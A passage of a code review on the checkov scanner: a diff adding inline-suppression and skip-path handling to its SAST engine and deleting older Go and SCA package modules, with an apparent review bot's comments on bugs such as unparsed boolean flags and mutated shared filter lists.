def get_check_thresholds(self, registry: Registry) -> Tuple[Severity, Severity]: """ 
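Review bot: `os.getenv("ENABLE_SAST_INLINE_SUPPRESSIONS", False)` yields the raw string, so any value present in the environment, including `"false"` or `"0"`, switches inline suppressions on and findings are then reported as SKIPPED unexpectedly; the SAST runner in this same diff already uses `convert_str_to_bool` for the equivalent flag, `self.enable_inline_suppressions = convert_str_to_bool(os.getenv("ENABLE_SAST_INLINE_SUPPRESSIONS", False))`, with the import from `checkov.common.util.type_forcers`. The new `CDK_FRAMEWORK_PREFIX` import was placed among the `checkov.sast.*` lines rather than with the other `checkov.common.sast.consts` import two lines below it; merging them keeps the group sorted.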
@@ -83,6 +86,11 @@ def get_reports(self, targets: List[str], registry: Registry, languages: Set[Sas check_threshold, skip_check_threshold = self.get_check_thresholds(registry) + skip_paths = registry.runner_filter.excluded_paths if registry.runner_filter else [] + + files_filter_manager = FilesFilterManager(targets, languages) + skip_paths += files_filter_manager.get_files_to_filter() + library_input: LibraryInput = { 'languages': languages, 'source_codes': targets, @@ -91,7 +99,8 @@ def get_reports(self, targets: List[str], registry: Registry, languages: Set[Sas 'skip_checks': registry.runner_filter.skip_checks if registry.runner_filter else [], 'check_threshold': check_threshold, 'skip_check_threshold': skip_check_threshold, - 'skip_path': registry.runner_filter.excluded_paths if registry.runner_filter else [], + 'platform_check_metadata': policy_metadata_integration.sast_check_metadata or {}, + 'skip_path': skip_paths, 'report_imports': registry.runner_filter.report_sast_imports if registry.runner_filter else False, 'remove_default_policies': registry.runner_filter.remove_default_sast_policies if registry.runner_filter else False, 'report_reachability': registry.runner_filter.report_sast_reachability if registry.runner_filter else False, @@ -194,6 +203,7 @@ def run_go_library(self, languages: Set[SastLanguages], skip_path: List[str], check_threshold: Severity, skip_check_threshold: Severity, + platform_check_metadata: Dict[str, Any], cdk_languages: List[CDKLanguages], list_policies: bool = False, report_imports: bool = True, @@ -223,6 +233,7 @@ def run_go_library(self, languages: Set[SastLanguages], "skip_path": skip_path, "check_threshold": str(check_threshold), "skip_check_threshold": str(skip_check_threshold), + "platform_check_metadata": platform_check_metadata, "list_policies": list_policies, "report_imports": report_imports, "remove_default_policies": remove_default_policies, 
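Review bot: `skip_paths = registry.runner_filter.excluded_paths ...` followed by `skip_paths += files_filter_manager.get_files_to_filter()` extends the runner filter's own `excluded_paths` list in place, so the generated JS build paths and hidden-directory names leak into every runner that reuses the same RunnerFilter afterwards; build a new list instead, `skip_paths = [*(registry.runner_filter.excluded_paths if registry.runner_filter else []), *files_filter_manager.get_files_to_filter()]`. get_reports continues outside the hunk.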
@@ -302,13 +313,13 @@ def create_report(self, prisma_report: PrismaReport) -> List[Union[SastReport, C reports: List[SastReport] = [] for lang, checks in prisma_report.rule_match.items(): sast_report = PrismaReport(rule_match={lang: checks}, errors=prisma_report.errors, profiler=prisma_report.profiler, - run_metadata=prisma_report.run_metadata, imports={}, reachability_report={}) + run_metadata=prisma_report.run_metadata, imports={}, reachability_report={}, + skipped_checks_by_file=prisma_report.skipped_checks_by_file) report = SastReport(f'{self.check_type.lower()}_{lang.value}', prisma_report.run_metadata, lang, sast_report) for check_id, match_rule in checks.items(): check_name = match_rule.check_name check_cwe = match_rule.check_cwe check_owasp = match_rule.check_owasp - check_result = _CheckResult(result=CheckResult.FAILED) severity = get_severity(match_rule.severity) for match in match_rule.matches: @@ -320,6 +331,12 @@ def create_report(self, prisma_report: PrismaReport) -> List[Union[SastReport, C code_block = get_code_block_from_start(split_code_block, location.start.row) metadata = match.metadata + if self.enable_inline_suppressions and any(skipped_check.check_id == match_rule.check_id for skipped_check in prisma_report.skipped_checks_by_file.get(file_abs_path, [])): + check_result = _CheckResult( + result=CheckResult.SKIPPED, + suppress_comment=next(skipped_check.suppress_comment for skipped_check in prisma_report.skipped_checks_by_file.get(file_abs_path, []) if skipped_check.check_id == match_rule.check_id)) + else: + check_result = _CheckResult(result=CheckResult.FAILED) record = SastRecord(check_id=check_id, check_name=check_name, resource="", evaluations={}, check_class="", check_result=check_result, code_block=code_block, file_path=file_path, file_line_range=file_line_range, metadata=metadata, 
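Review bot: The inline-suppression branch scans `prisma_report.skipped_checks_by_file.get(file_abs_path, [])` twice per match (`any` and then `next`) for a result that does not change between the two, and the `else` duplicates the `_CheckResult(result=CheckResult.FAILED)` that used to be built once above the loop; look the suppression up once and branch on it, as below (assuming `file_abs_path` is per match, as the existing lookup implies). create_report continues outside the hunk.
```python
                    metadata = match.metadata
                    skipped_checks = prisma_report.skipped_checks_by_file.get(file_abs_path, []) if self.enable_inline_suppressions else []
                    suppression = next((s for s in skipped_checks if s.check_id == match_rule.check_id), None)
                    if suppression is not None:
                        check_result = _CheckResult(result=CheckResult.SKIPPED, suppress_comment=suppression.suppress_comment)
                    else:
                        check_result = _CheckResult(result=CheckResult.FAILED)
                    # … unchanged: SastRecord construction …
```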
@@ -338,7 +355,8 @@ def create_report(self, prisma_report: PrismaReport) -> List[Union[SastReport, C break else: sast_report = PrismaReport(rule_match={lang: {}}, errors=prisma_report.errors, profiler=prisma_report.profiler, - run_metadata=prisma_report.run_metadata, imports={}, reachability_report={}) + run_metadata=prisma_report.run_metadata, imports={}, reachability_report={}, + skipped_checks_by_file={}) report = SastReport(f'{self.check_type.lower()}_{lang.value}', prisma_report.run_metadata, lang, sast_report) report.sast_imports = prisma_report.imports[lang] reports.append(report) @@ -350,7 +368,8 @@ def create_report(self, prisma_report: PrismaReport) -> List[Union[SastReport, C break else: sast_report = PrismaReport(rule_match={lang: {}}, errors=prisma_report.errors, profiler=prisma_report.profiler, - run_metadata=prisma_report.run_metadata, imports={}, reachability_report={}) + run_metadata=prisma_report.run_metadata, imports={}, reachability_report={}, + skipped_checks_by_file={}) report = SastReport(f'{self.check_type.lower()}_{lang.value}', prisma_report.run_metadata, lang, sast_report) report.sast_reachability = prisma_report.reachability_report[lang] reports.append(report) @@ -383,7 +402,7 @@ def _update_cdk_report(lang: SastLanguages, cdk_reports: List[CDKReport], sast_r new_cdk_report = PrismaReport(rule_match={lang: {}}, errors=sast_report.sast_report.errors, profiler=sast_report.sast_report.profiler, run_metadata=sast_report.sast_report.run_metadata, - imports={}, reachability_report={}) + imports={}, reachability_report={}, skipped_checks_by_file={}) new_report = CDKReport(f'{CDK_FRAMEWORK_PREFIX}_{lang.value}', sast_report.sast_report.run_metadata, lang, new_cdk_report) cdk_reports.append(new_report) for cdk_report in cdk_reports: 
@@ -459,6 +478,7 @@ def get_policies(self, languages: Set[SastLanguages]) -> SastPolicies: 'skip_checks': [], 'check_threshold': Severities[BcSeverities.NONE], 'skip_check_threshold': Severities[BcSeverities.NONE], + 'platform_check_metadata': policy_metadata_integration.sast_check_metadata, 'skip_path': [], 'report_imports': False, 'report_reachability': False, diff --git a/checkov/sast/prisma_models/library_input.py b/checkov/sast/prisma_models/library_input.py index c4ba4e6b0ac..2780f4f8623 100644 --- a/checkov/sast/prisma_models/library_input.py +++ b/checkov/sast/prisma_models/library_input.py @@ -1,4 +1,4 @@ -from typing import Set, List +from typing import Set, List, Dict, Any from checkov.common.bridgecrew.severities import Severity from checkov.common.sast.consts import SastLanguages, CDKLanguages @@ -18,6 +18,7 @@ class LibraryInput(TypedDict): skip_path: List[str] check_threshold: Severity skip_check_threshold: Severity + platform_check_metadata: Dict[str, Any] list_policies: NotRequired[bool] report_imports: bool remove_default_policies: NotRequired[bool] diff --git a/checkov/sast/runner.py b/checkov/sast/runner.py index 351c65bd37c..ac28a192943 100644 --- a/checkov/sast/runner.py +++ b/checkov/sast/runner.py 
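Review bot: `get_policies` passes `policy_metadata_integration.sast_check_metadata` straight through, while `get_reports` in this same diff writes `policy_metadata_integration.sast_check_metadata or {}`; `LibraryInput.platform_check_metadata` is typed `Dict[str, Any]`, so when no platform metadata has been fetched the library receives `null` from one path and `{}` from the other. Use `or {}` in both places so the Go side sees one shape.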
@@ -3,14 +3,17 @@ import logging import os import sys +from checkov.common.util.type_forcers import convert_str_to_bool +from checkov.common.sast.consts import SastLanguages + from checkov.common.bridgecrew.check_type import CheckType from checkov.common.bridgecrew.platform_integration import bc_integration from checkov.common.output.report import Report from checkov.common.runners.base_runner import BaseRunner -from checkov.common.sast.consts import SUPPORT_FILE_EXT, FILE_EXT_TO_SAST_LANG, CDKLanguages +from checkov.common.sast.consts import SUPPORT_FILE_EXT, FILE_EXT_TO_SAST_LANG, CDKLanguages, CDK_CHECKS_DIR_PATH from checkov.runner_filter import RunnerFilter -from checkov.sast.checks_infra.base_registry import CDK_CHECKS_DIR_PATH, Registry +from checkov.sast.checks_infra.base_registry import Registry from checkov.sast.engines.prisma_engine import PrismaEngine from typing import List, Optional @@ -41,7 +44,8 @@ def run(self, root_folder: Optional[str], collect_skip_comments: bool = True) -> List[Report]: if sys.platform.startswith('win'): - # TODO: Enable SAST for windows runners + logger.warning('Skip SAST for windows') + # TODO: Enable SAST for windows runners. return [Report(self.check_type)] if not runner_filter: @@ -53,6 +57,11 @@ def run(self, root_folder: Optional[str], bc_integration.setup_http_manager() bc_integration.set_s3_client() + # Todo remove when golang is stable in platform + if not bool(convert_str_to_bool(os.getenv('ENABLE_SAST_GOLANG', False))): + if SastLanguages.GOLANG in runner_filter.sast_languages: + runner_filter.sast_languages.remove(SastLanguages.GOLANG) + # registry get all the paths self.registry.set_runner_filter(runner_filter) self.registry.add_external_dirs(external_checks_dir) 
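Review bot: `runner_filter.sast_languages.remove(SastLanguages.GOLANG)` mutates the set on the caller's RunnerFilter, so after one SAST run every later consumer of that filter also sees Go dropped; take a local copy, `languages = set(runner_filter.sast_languages)`, and remove from that (how `sast_languages` is consumed below is outside the hunk, so the local may need to be threaded through). The `bool(...)` around `convert_str_to_bool(...)` is redundant if that helper already returns a bool, as its name says. The two new imports were placed above the existing `checkov.common.*` group rather than within it; `convert_str_to_bool` and `SastLanguages` belong alongside the other `checkov.common` imports a few lines down.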
@@ -66,7 +75,7 @@ def run(self, root_folder: Optional[str], targets.extend([a if os.path.isabs(a) else os.path.abspath(a) for a in files]) if self.cdk_langs: - self.registry.checks_dirs_path.append(CDK_CHECKS_DIR_PATH) + self.registry.checks_dirs_path.append(str(CDK_CHECKS_DIR_PATH)) reports = [] try: diff --git a/checkov/sast_core/Makefile b/checkov/sast_core/Makefile deleted file mode 100644 index 660b062f235..00000000000 --- a/checkov/sast_core/Makefile +++ /dev/null @@ -1,2 +0,0 @@ -build: - go build -buildmode=c-shared -o library.so library.go diff --git a/checkov/sast_core/go.mod b/checkov/sast_core/go.mod deleted file mode 100644 index 6558600a0b9..00000000000 --- a/checkov/sast_core/go.mod +++ /dev/null @@ -1,5 +0,0 @@ -module github.com/bridgecrewio/checkov/checkov/sast_core - -go 1.19 - -require github.com/smacker/go-tree-sitter v0.0.0-20230226123037-c459dbde1464 diff --git a/checkov/sast_core/go.sum b/checkov/sast_core/go.sum deleted file mode 100644 index 60c69ebe2cf..00000000000 --- a/checkov/sast_core/go.sum +++ /dev/null 
@@ -1,16 +0,0 @@ -github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= -github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c= -github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= -github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM= -github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= -github.com/smacker/go-tree-sitter v0.0.0-20230226123037-c459dbde1464 h1:hd1+Vqu6uQZlNG0hGncjAvqENdxfAd0X4MKR2Tjclt8= -github.com/smacker/go-tree-sitter v0.0.0-20230226123037-c459dbde1464/go.mod h1:q99oHDsbP0xRwmn7Vmob8gbSMNyvJ83OauXPSuHQuKE= -github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME= -github.com/stretchr/objx v0.4.0/go.mod h1:YvHI0jy2hoMjB+UWwv71VJQ9isScKT/TqJzVSSt89Yw= -github.com/stretchr/testify v1.7.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= -github.com/stretchr/testify v1.7.4 h1:wZRexSlwd7ZXfKINDLsO4r7WBt3gTKONc6K/VesHvHM= -github.com/stretchr/testify v1.7.4/go.mod h1:yNjHg4UonilssWZ8iaSj1OCr/vHnekPRkoO+kdMU+MU= -gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= -gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= -gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA= -gopkg.in/yaml.v3 v3.0.1/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= diff --git a/checkov/sast_core/library.go b/checkov/sast_core/library.go deleted file mode 100644 index ede1821f3f3..00000000000 --- a/checkov/sast_core/library.go +++ /dev/null 
@@ -1,42 +0,0 @@ -package main - -import ( - "C" - "encoding/json" - "log" - - sitter "github.com/smacker/go-tree-sitter" - "github.com/smacker/go-tree-sitter/python" -) - -type CheckovDocument struct { - SourceCodeFile string `json:"source_code_file"` - SourceCodeDir string `json:"source_code_dir"` - PolicyDir string `json:"policy_dir"` - PoliciyFile string `json:"policiy_file"` - Language string `json:"language"` -} - -var langs = map[string]*sitter.Language{ - "python": python.GetLanguage(), -} - -//export analyzeCode -func analyzeCode(documentPtr *C.char) *C.char { - documentString := C.GoString(documentPtr) - jsonDocument := CheckovDocument{} - err := json.Unmarshal([]byte(documentString), &jsonDocument) - if err != nil { - log.Fatal(err) - } - log.Println(jsonDocument) - parser := sitter.NewParser() - parser.SetLanguage(langs[jsonDocument.Language]) - - mapD := map[string]int{"matches": 0, "profiler": 0} - toReturn, _ := json.Marshal(mapD) - return C.CString(string(toReturn)) -} - -func main() { -} diff --git a/checkov/sca_image/runner.py b/checkov/sca_image/runner.py index e74578de8c7..7adb8d3f9f3 100644 --- a/checkov/sca_image/runner.py +++ b/checkov/sca_image/runner.py @@ -25,7 +25,7 @@ from checkov.common.util.dockerfile import is_dockerfile from checkov.common.util.http_utils import request_wrapper from checkov.runner_filter import RunnerFilter -from checkov.sca_package.runner import Runner as PackageRunner +from checkov.sca_package_2.runner import Runner as PackageRunner class Runner(PackageRunner): diff --git a/checkov/sca_package/output.py b/checkov/sca_package/output.py deleted file mode 100644 index 3e14cacb6af..00000000000 --- a/checkov/sca_package/output.py +++ /dev/null 
@@ -1,360 +0,0 @@ -from __future__ import annotations - -import itertools -import logging -from collections import defaultdict -from dataclasses import dataclass -from typing import List, Union, Dict, Any - -from prettytable import PrettyTable, SINGLE_BORDER - -from checkov.common.bridgecrew.severities import BcSeverities -from checkov.common.models.enums import CheckResult -from checkov.common.output.common import compare_table_items_severity -from checkov.common.output.record import Record, SCA_PACKAGE_SCAN_CHECK_NAME, SCA_LICENSE_CHECK_NAME -from checkov.common.packaging import version as packaging_version -from checkov.common.sca.commons import UNFIXABLE_VERSION, get_package_alias -from checkov.common.typing import _LicenseStatus - - -@dataclass -class CveCount: - total: int = 0 - critical: int = 0 - high: int = 0 - medium: int = 0 - low: int = 0 - skipped: int = 0 - has_fix: int = 0 - to_fix: int = 0 - fixable: bool = True - - def output_row(self) -> List[str]: - return [ - f"Total CVEs: {self.total}", - f"critical: {self.critical}", - f"high: {self.high}", - f"medium: {self.medium}", - f"low: {self.low}", - f"skipped: {self.skipped}", - ] - - -def calculate_lowest_compliant_version( - fix_versions_lists: List[List[Union[packaging_version.Version, packaging_version.LegacyVersion]]] -) -> str: - """A best effort approach to find the lowest compliant version""" - - package_min_versions = set() - package_versions = set() - - for fix_versions in fix_versions_lists: - if fix_versions: - package_min_versions.add(min(fix_versions)) - package_versions.update(fix_versions) - if package_min_versions: - package_min_version = min(package_min_versions) - package_max_version = max(package_min_versions) - - if isinstance(package_min_version, packaging_version.LegacyVersion) or isinstance( - package_max_version, packaging_version.LegacyVersion - ): - return str(package_max_version) - elif package_min_version.major == package_max_version.major: - return 
str(package_max_version) - else: - lowest_version = max( - version - for version in package_versions - if isinstance(version, packaging_version.Version) and version.major == package_max_version.major - ) - return str(lowest_version) - - return UNFIXABLE_VERSION - - -def create_cli_output(fixable: bool = True, *cve_records: list[Record]) -> str: - cli_outputs = [] - group_by_file_path_package_map: dict[str, dict[str, list[Record]]] = defaultdict(dict) - - for record in itertools.chain(*cve_records): - if not record.vulnerability_details: - # this shouldn't happen - logging.error(f"'vulnerability_details' is not set for {record.check_id}") - continue - - group_by_file_path_package_map[record.file_path].setdefault( - record.vulnerability_details["package_name"], [] - ).append(record) - - for file_path, packages in group_by_file_path_package_map.items(): - cve_count = CveCount(fixable=fixable) - package_cves_details_map: dict[str, dict[str, Any]] = defaultdict(dict) - package_licenses_details_map = defaultdict(list) - should_print_licenses_table = False - for package_name, records in packages.items(): - package_version = None - fix_versions_lists = [] - - for record in records: - if not record.vulnerability_details: - # this shouldn't happen - logging.error(f"'vulnerability_details' is not set for {record.check_id}") - continue - - if record.check_name == SCA_PACKAGE_SCAN_CHECK_NAME: - cve_count.total += 1 - - if record.check_result["result"] == CheckResult.SKIPPED: - cve_count.skipped += 1 - continue - else: - cve_count.to_fix += 1 - - # best way to dynamically access a class instance attribute. 
- # (we can't just do cve_count.severity_str to access the correct severity) - severity_str = record.severity.name.lower() if record.severity else BcSeverities.NONE.lower() - setattr(cve_count, severity_str, getattr(cve_count, severity_str) + 1) - - if record.vulnerability_details["lowest_fixed_version"] != UNFIXABLE_VERSION: - cve_count.has_fix += 1 - - fix_versions_lists.append(record.vulnerability_details["fixed_versions"]) - if package_version is None: - package_version = record.vulnerability_details["package_version"] - - package_cves_details_map[package_name].setdefault("cves", []).append( - { - "id": record.vulnerability_details["id"], - "severity": severity_str, - "fixed_version": record.vulnerability_details["lowest_fixed_version"], - } - ) - elif record.check_name == SCA_LICENSE_CHECK_NAME: - if record.check_result["result"] == CheckResult.SKIPPED: - continue - should_print_licenses_table = True - package_licenses_details_map[get_package_alias(package_name, record.vulnerability_details["package_version"])].append( - _LicenseStatus(package_name=package_name, - package_version=record.vulnerability_details["package_version"], - policy=record.vulnerability_details["policy"], - license=record.vulnerability_details["license"], - status=record.vulnerability_details["status"]) - ) - - if package_name in package_cves_details_map: - package_cves_details_map[package_name]["cves"].sort(key=compare_table_items_severity, reverse=True) - package_cves_details_map[package_name]["current_version"] = package_version - package_cves_details_map[package_name]["compliant_version"] = calculate_lowest_compliant_version( - fix_versions_lists - ) - - if cve_count.total > 0: - cli_outputs.append( - create_cli_cves_table( - file_path=file_path, - cve_count=cve_count, - package_details_map=package_cves_details_map, - ) - ) - if should_print_licenses_table: - cli_outputs.append( - create_cli_license_violations_table( - file_path=file_path, - 
package_licenses_details_map=package_licenses_details_map - ) - ) - - return "\n".join(cli_outputs) - - -def create_cli_license_violations_table(file_path: str, package_licenses_details_map: Dict[str, List[_LicenseStatus]]) -> str: - package_table_lines: List[str] = [] - columns = 5 - table_width = 126 - column_width = int(table_width / columns) - package_table = PrettyTable(min_table_width=table_width, max_table_width=table_width) - package_table.set_style(SINGLE_BORDER) - package_table.field_names = [ - "Package name", - "Package version", - "Policy ID", - "License", - "Status", - ] - for package_idx, (_, license_statuses) in enumerate(package_licenses_details_map.items()): - if package_idx > 0: - del package_table_lines[-1] - package_table.header = False - package_table.clear_rows() - - for idx, license_status in enumerate(license_statuses): - col_package_name = "" - col_package_version = "" - if idx == 0: - col_package_name = license_status["package_name"] - col_package_version = license_status["package_version"] - - package_table.add_row( - [ - col_package_name, - col_package_version, - license_status["policy"], - license_status["license"], - license_status["status"], - ] - ) - - package_table.align = "l" - package_table.min_width = column_width - package_table.max_width = column_width - - for idx, line in enumerate(package_table.get_string().splitlines(keepends=True)): - if idx == 0 and package_idx != 0: - # hack to make multiple tables look like one - line = line.replace(package_table.top_left_junction_char, package_table.left_junction_char).replace( - package_table.top_right_junction_char, package_table.right_junction_char - ) - if package_idx > 0: - # hack to make multiple package tables look like one - line = line.replace(package_table.top_junction_char, package_table.junction_char) - - # hack for making the table's width as same as the cves-table's - package_table_lines.append(f"\t{line[:-2]}{line[-3]}{line[-2:]}") - - return ( - f"\t{file_path} - 
Licenses Statuses:\n" - f"{''.join(package_table_lines)}\n" - ) - - -def create_cli_cves_table(file_path: str, cve_count: CveCount, package_details_map: Dict[str, Dict[str, Any]]) -> str: - columns = 6 - table_width = 126 - column_width = int(126 / columns) - - cve_table_lines = create_cve_summary_table_part( - table_width=table_width, column_width=column_width, cve_count=cve_count - ) - - vulnerable_packages = True if package_details_map else False - fixable_table_lines = create_fixable_cve_summary_table_part( - table_width=table_width, cve_count=cve_count, vulnerable_packages=vulnerable_packages - ) - - package_table_lines = create_package_overview_table_part( - table_width=table_width, column_width=column_width, package_details_map=package_details_map - ) - - return ( - f"\t{file_path} - CVEs Summary:\n" - f"{''.join(cve_table_lines)}\n" - f"{''.join(fixable_table_lines)}" - f"{''.join(package_table_lines)}\n" - ) - - -def create_cve_summary_table_part(table_width: int, column_width: int, cve_count: CveCount) -> List[str]: - cve_table = PrettyTable( - header=False, - padding_width=1, - min_table_width=table_width, - max_table_width=table_width, - ) - cve_table.set_style(SINGLE_BORDER) - cve_table.add_row(cve_count.output_row()) - cve_table.align = "l" - cve_table.min_width = column_width - cve_table.max_width = column_width - - cve_table_lines = [f"\t{line}" for line in cve_table.get_string().splitlines(keepends=True)] - # hack to make multiple tables look like one - cve_table_bottom_line = ( - cve_table_lines[-1] - .replace(cve_table.bottom_left_junction_char, cve_table.left_junction_char) - .replace(cve_table.bottom_right_junction_char, cve_table.right_junction_char) - ) - cve_table_lines[-1] = cve_table_bottom_line - - return cve_table_lines - - -def create_fixable_cve_summary_table_part( - table_width: int, cve_count: CveCount, vulnerable_packages: bool -) -> List[str]: - fixable_table = PrettyTable( - header=False, min_table_width=table_width + 1, 
max_table_width=table_width + 1 - ) - fixable_table.set_style(SINGLE_BORDER) - if cve_count.fixable: - fixable_table.add_row( - [f"To fix {cve_count.has_fix}/{cve_count.to_fix} CVEs, go to your Prisma Cloud account"]) - fixable_table.align = "l" - - # hack to make multiple tables look like one - fixable_table_lines = [f"\t{line}" for line in fixable_table.get_string().splitlines(keepends=True)] - del fixable_table_lines[0] - # only remove the last line, if there are vulnerable packages - if vulnerable_packages: - del fixable_table_lines[-1] - - return fixable_table_lines - - -def create_package_overview_table_part( - table_width: int, column_width: int, package_details_map: Dict[str, Dict[str, Any]] -) -> List[str]: - package_table_lines: List[str] = [] - package_table = PrettyTable(min_table_width=table_width, max_table_width=table_width) - package_table.set_style(SINGLE_BORDER) - package_table.field_names = [ - "Package", - "CVE ID", - "Severity", - "Current version", - "Fixed version", - "Compliant version", - ] - for package_idx, (package_name, details) in enumerate(package_details_map.items()): - if package_idx > 0: - del package_table_lines[-1] - package_table.header = False - package_table.clear_rows() - - for cve_idx, cve in enumerate(details["cves"]): - col_package = "" - col_current_version = "" - col_compliant_version = "" - if cve_idx == 0: - col_package = package_name - col_current_version = details["current_version"] - col_compliant_version = details["compliant_version"] - - package_table.add_row( - [ - col_package, - cve["id"], - cve["severity"], - col_current_version, - cve["fixed_version"], - col_compliant_version, - ] - ) - - package_table.align = "l" - package_table.min_width = column_width - package_table.max_width = column_width - - for idx, line in enumerate(package_table.get_string().splitlines(keepends=True)): - if idx == 0: - # hack to make multiple tables look like one - line = line.replace(package_table.top_left_junction_char, 
package_table.left_junction_char).replace( - package_table.top_right_junction_char, package_table.right_junction_char - ) - if package_idx > 0: - # hack to make multiple package tables look like one - line = line.replace(package_table.top_junction_char, package_table.junction_char) - - package_table_lines.append(f"\t{line}") - - return package_table_lines diff --git a/checkov/sca_package/runner.py b/checkov/sca_package/runner.py deleted file mode 100644 index 552d0560cf2..00000000000 --- a/checkov/sca_package/runner.py +++ /dev/null 
@@ -1,172 +0,0 @@ -from __future__ import annotations - -import logging -from pathlib import Path -from typing import Sequence, Any - -from checkov.common.sca.commons import should_run_scan -from checkov.common.sca.output import add_to_report_sca_data -from checkov.common.typing import _LicenseStatus -from checkov.common.bridgecrew.platform_integration import bc_integration -from checkov.common.models.consts import SUPPORTED_PACKAGE_FILES -from checkov.common.models.enums import ErrorStatus -from checkov.common.output.report import Report -from checkov.common.bridgecrew.check_type import CheckType -from checkov.common.runners.base_runner import BaseRunner, ignored_directories -from checkov.runner_filter import RunnerFilter -from checkov.sca_package.scanner import Scanner - - -class Runner(BaseRunner[None, None, None]): - check_type = CheckType.SCA_PACKAGE # noqa: CCE003 # a static attribute - - def __init__(self, report_type: str = check_type) -> None: - super().__init__(file_names=SUPPORTED_PACKAGE_FILES) - self._check_class: str | None = None - self._code_repo_path: Path | None = None - self.report_type = report_type - - def prepare_and_scan( - self, - root_folder: str | Path | None, - files: list[str] | None = None, - runner_filter: RunnerFilter | None = None, - exclude_package_json: bool = True, - excluded_file_names: set[str] | None = None, - ) -> Sequence[dict[str, Any]] | None: - runner_filter = runner_filter or RunnerFilter() - excluded_file_names = excluded_file_names or set() - - # skip complete run, if flag '--check' was used without a CVE check ID or the license policies - if not should_run_scan(runner_filter.checks): - return [] - - if not bc_integration.bc_api_key: - logging.info("The --bc-api-key flag needs to be set to run SCA package scanning") - return [] - - logging.info("SCA package scanning searching for scannable files") - - self._code_repo_path = Path(root_folder) if root_folder else None - - excluded_paths = {*ignored_directories} - if 
runner_filter.excluded_paths: - excluded_paths.update(runner_filter.excluded_paths) - - input_paths = self.find_scannable_files( - root_path=self._code_repo_path, - files=files, - excluded_paths=excluded_paths, - exclude_package_json=exclude_package_json, - excluded_file_names=excluded_file_names - ) - if not input_paths: - # no packages found - return [] - - logging.info(f"SCA package scanning will scan {len(input_paths)} files") - - scanner = Scanner(self.pbar, root_folder) - self._check_class = f"{scanner.__module__}.{scanner.__class__.__qualname__}" - - # it will be None in case of unexpected failure during the scanning - scan_results: Sequence[dict[str, Any]] | None = scanner.scan(input_paths) - if scan_results is not None: - logging.info(f"SCA package scanning successfully scanned {len(scan_results)} files") - return scan_results - - def run( - self, - root_folder: str | Path | None, - external_checks_dir: list[str] | None = None, - files: list[str] | None = None, - runner_filter: RunnerFilter | None = None, - collect_skip_comments: bool = True, - ) -> Report | list[Report]: - runner_filter = runner_filter or RunnerFilter() - if not runner_filter.show_progress_bar: - self.pbar.turn_off_progress_bar() - - report = Report(self.check_type) - - scan_results = self.prepare_and_scan(root_folder, files, runner_filter) - if scan_results is None: - report.set_error_status(ErrorStatus.ERROR) - return report - - for result in scan_results: - if not result: - continue - package_file_path = Path(result["repository"]) - if self._code_repo_path: - try: - package_file_path = package_file_path.relative_to(self._code_repo_path) - except ValueError: - # Path.is_relative_to() was implemented in Python 3.9 - pass - - vulnerabilities = result.get("vulnerabilities") or [] - packages = result.get("packages") or [] - - license_statuses = [_LicenseStatus(package_name=elm["packageName"], package_version=elm["packageVersion"], - policy=elm["policy"], license=elm["license"], 
status=elm["status"]) - for elm in result.get("license_statuses") or []] - - rootless_file_path = str(package_file_path).replace(package_file_path.anchor, "", 1) - add_to_report_sca_data( - report=report, - check_class=self._check_class, - scanned_file_path=str(package_file_path), - rootless_file_path=rootless_file_path, - runner_filter=runner_filter, - vulnerabilities=vulnerabilities, - packages=packages, - license_statuses=license_statuses, - report_type=self.report_type, - dependencies=result.get("dependencies", None) - ) - - return report - - def find_scannable_files( - self, - root_path: Path | None, - files: list[str] | None, - excluded_paths: set[str], - exclude_package_json: bool = True, - excluded_file_names: set[str] | None = None, - extra_supported_package_files: set[str] | None = None - ) -> set[Path]: - excluded_file_names = excluded_file_names or set() - extra_supported_package_files = extra_supported_package_files or set() - input_paths: set[Path] = set() - if root_path: - input_paths = { - file_path - for file_path in root_path.glob("**/*") - if file_path.name in SUPPORTED_PACKAGE_FILES.union(extra_supported_package_files) and not any(p in file_path.parts for p in excluded_paths) - } - - package_json_lock_parent_paths = set() - if exclude_package_json: - # filter out package.json, if package-lock.json or yarn.lock exists - package_json_lock_parent_paths = { - file_path.parent for file_path in input_paths if - file_path.name in {"package-lock.json", "yarn.lock"} - } - - input_paths = { - file_path - for file_path in input_paths - if (file_path.name != "package.json" or file_path.parent not in package_json_lock_parent_paths) and file_path.name not in excluded_file_names - } - - for file in files or []: - file_path = Path(file) - if not file_path.exists(): - logging.warning(f"File {file_path} doesn't exist") - continue - - input_paths.add(file_path) - - return input_paths 
diff --git a/checkov/sca_package/scanner.py b/checkov/sca_package/scanner.py deleted file mode 100644 index e662c4a99a6..00000000000 --- a/checkov/sca_package/scanner.py +++ /dev/null 
